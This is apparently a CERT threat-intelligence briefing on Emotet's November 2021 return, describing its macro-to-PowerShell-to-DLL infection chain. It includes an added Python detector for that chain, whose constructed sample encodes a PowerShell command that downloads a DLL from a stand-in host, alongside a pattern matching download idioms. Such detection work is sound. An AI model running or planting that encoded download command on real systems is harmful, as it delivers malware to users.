Briefing Malware
BLOG CERT SOGETI ESEC

Briefing Malware - 23/11/2021

23rd of November 2021 - Winners of the 47th week: Redline, Emotet and Formbook.

Some links point to extended actionable intelligence (Threat Bulletins, TTPs, signatures, etc.) on our Threat Intelligence Platform, Anomali. This access is limited to our clients.


Threat statistics report

Publication date:

23/11/2021

Distribution:

TLP: WHITE

What's new?

Emotet (ID Mitre: S0367)

Netskope Threat Coverage: The Return of Emotet

#Netskope published a report about the return of one of the most important threats of the beginning of this year, #Emotet. This threat has been spotted again in a campaign delivered through the #Trickbot botnet infrastructure. Emotet has been active since 2014; it started as a #banking trojan and evolved into a botnet used to deliver other loaders such as Trickbot or #IcedID, as well as #ransomware payloads, namely #Ryuk, before being taken down by law enforcement agencies in January 2021. The new campaign lures victims into enabling macros in Microsoft Office, which execute obfuscated #Powershell scripts that download malicious DLLs; the chain ends with a packed DLL, and the last step is Emotet executing in memory. After that, Emotet starts communicating with its Command and Control (#C&C) servers. As of writing, 13 servers are online.
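As an added illustration (not code from Netskope or from this briefing), the detection below flags the Office-macro-to-PowerShell-to-DLL-download step of the chain described above in process-creation telemetry: an Office parent spawning PowerShell whose command line, once any `-EncodedCommand` payload is decoded, fetches a DLL. The JSON event format and the sample events are constructed for the example.

```python
import base64
import json
import re

# Assumed Office parents and download idioms to look for (tuned to the chain above:
# Office macro -> obfuscated PowerShell -> DLL download).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
DLL_FETCH = re.compile(
    r"(?:downloadfile|downloadstring|invoke-webrequest|start-bitstransfer)\b.*?\.dll", re.I)
ENC_FLAG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

def encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand expects base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

def decode_encoded_command(cmdline: str) -> str:
    """Return the script hidden behind -EncodedCommand/-enc, or '' if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except ValueError:
        return ""

def is_suspicious(event: dict) -> bool:
    """Office parent + PowerShell child + (decoded) command line fetching a DLL."""
    if event.get("parent", "").lower() not in OFFICE_PARENTS:
        return False
    if "powershell" not in event.get("image", "").lower():
        return False
    cmdline = event.get("cmdline", "")
    decoded = decode_encoded_command(cmdline)
    return bool(DLL_FETCH.search(decoded) or DLL_FETCH.search(cmdline))

def scan(lines):
    """Return the pids of process-creation events (JSON lines) matching the chain."""
    return [e["pid"] for e in map(json.loads, lines) if is_suspicious(e)]

# Constructed sample events, not real telemetry.
MALICIOUS_SCRIPT = ("(New-Object Net.WebClient).DownloadFile("
                    "'http://example.invalid/x','C:\\Users\\Public\\x.dll')")
SAMPLE_LINES = [
    json.dumps({"pid": 4101, "parent": "WINWORD.EXE", "image": "powershell.exe",
                "cmdline": "powershell -nop -w hidden -enc " + encode_ps(MALICIOUS_SCRIPT)}),
    json.dumps({"pid": 4102, "parent": "explorer.exe", "image": "powershell.exe",
                "cmdline": "powershell -enc " + encode_ps(MALICIOUS_SCRIPT)}),
    json.dumps({"pid": 4103, "parent": "WINWORD.EXE", "image": "powershell.exe",
                "cmdline": "powershell Get-Date"}),
]

if __name__ == "__main__":
    print(scan(SAMPLE_LINES))  # [4101]
```

Only the first event trips all three conditions; the second lacks the Office parent and the third has no DLL download, which keeps the rule narrow enough for triage.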


https://www.netskope.com/blog/netskope-threat-coverage-the-return-of-emotet
